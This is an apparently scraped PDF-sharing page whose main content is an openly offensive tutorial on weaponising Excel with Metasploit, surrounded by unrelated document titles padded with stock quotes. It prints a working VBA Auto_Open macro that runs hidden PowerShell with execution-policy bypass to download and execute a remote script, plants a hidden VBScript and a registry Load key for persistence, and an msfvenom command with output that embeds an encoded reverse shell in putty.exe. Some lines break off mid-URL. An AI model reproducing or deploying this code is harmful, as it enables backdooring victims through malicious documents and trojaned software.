Excel Malware with Metasploit | Network Security Protocols [PDF]

Mar 27, 2016 - Today the most dangerous malware like rasomware and crypto malware infect the systems propagating via ema

11 downloads 30 Views 3MB Size

Recommend Stories


A Survey Of Wireless Network Security Protocols
Every block of stone has a statue inside it and it is the task of the sculptor to discover it. Mich

Security Protocols
Don't count the days, make the days count. Muhammad Ali

Security Protocols
What you seek is seeking you. Rumi

Network Security With Openssl
Raise your words, not voice. It is rain that grows flowers, not thunder. Rumi

Metasploit
Learning never exhausts the mind. Leonardo da Vinci

Website Malware Security Scanning
Your task is not to seek for love, but merely to seek and find all the barriers within yourself that

Network Forensic & Incident Response : MALWARE ~ | Bam [PDF]
Dec 19, 2016 - Tak lupa penyusun mengucapkan terima kasih kepada semua pihak yang telah membantu demi tersusunya makalah ini. Penyusun menyadari bahwa makalah ini jauh dari kata sempurna,oleh karena itu demi perbaikan laporan ini segala saran,kritik,

Metasploit
Just as there is no loss of basic energy in the universe, so no thought or action is without its effects,

Metasploit For Beginners Pdf
You miss 100% of the shots you don’t take. Wayne Gretzky

Penetration Testing with Metasploit Framework [PDF]
When i say "Penetration Testing tool" the first thing that comes to your mind is the world's largest. Ruby project, with over 700,000 lines of code 'Metasploit'. No wonder it had become the de-facto standard for penetration testing and vulnerability

Idea Transcript


Rate this

1. Invoke-Shell.ps1: power shell code for Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. Written by Matthew Graeber. 2. GenerateMacro.ps1: Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. Written by Matthew Graeber. 3. Metasploit framework available on Kali.

Sub Auto_Open() Execute Persist Reg Start End Sub Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = “.” Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2”) Set objStartup = objWMIService.Get(“Win32_ProcessStartup”) Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”)

objProcess.Create “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX (New-Object Net.WebClient).DownloadString(“https://raw.githubusercontent.com/PowerShellEmpire/E End Function Public Function Persist() As Variant Set fs = CreateObject(“Scripting.FileSystemObject”) Set a = fs.CreateTextFile(“C:\Users\Public\config.txt”, True) a.WriteLine (“Dim objShell”) a.WriteLine (“Set objShell = WScript.CreateObject(“”WScript.Shell””)”)

a.WriteLine (“command = “”C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.gi a.WriteLine (“objShell.Run command,0”) a.WriteLine (“Set objShell = Nothing”) a.Close GivenLocation = “C:\Users\Public\” OldFileName = “config.txt” NewFileName = “config.vbs” Name GivenLocation & OldFileName As GivenLocation & NewFileName

Powered by

SetAttr “C:\Users\Public\config.vbs”, vbHidden End Function Public Function Reg() As Variant Set WshShell = CreateObject(“WScript.Shell”) WshShell.RegWrite “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load”, “C:\Users\Public\config.vbs”, “REG_SZ” Set WshShell = Nothing End Function Public Function Start() As Variant Const HIDDEN_WINDOW = 0 strComputer = “.” Shell “wscript C:\Users\Public\config.vbs”, vbNormalFocus End Function

root@kali:~# msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -b “\x90” -x ./putty.exe -e x86/shikata_ga_nai -f exe -i 10 -o /tmp/winreversetcp.exe Found 1 compatible encoders Attempting to encode payload with 10 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 360 (iteration=0) x86/shikata_ga_nai succeeded with size 387 (iteration=1) x86/shikata_ga_nai succeeded with size 414 (iteration=2) x86/shikata_ga_nai succeeded with size 441 (iteration=3) x86/shikata_ga_nai succeeded with size 468 (iteration=4) x86/shikata_ga_nai succeeded with size 495 (iteration=5) x86/shikata_ga_nai succeeded with size 522 (iteration=6) x86/shikata_ga_nai succeeded with size 549 (iteration=7) x86/shikata_ga_nai succeeded with size 576 (iteration=8) x86/shikata_ga_nai succeeded with size 603 (iteration=9) x86/shikata_ga_nai chosen with final size 603 Payload size: 603 bytes Saved as: /tmp/winreversetcp.exe

Smile Life

When life gives you a hundred reasons to cry, show life that you have a thousand reasons to smile

Get in touch

© Copyright 2015 - 2024 PDFFOX.COM - All rights reserved.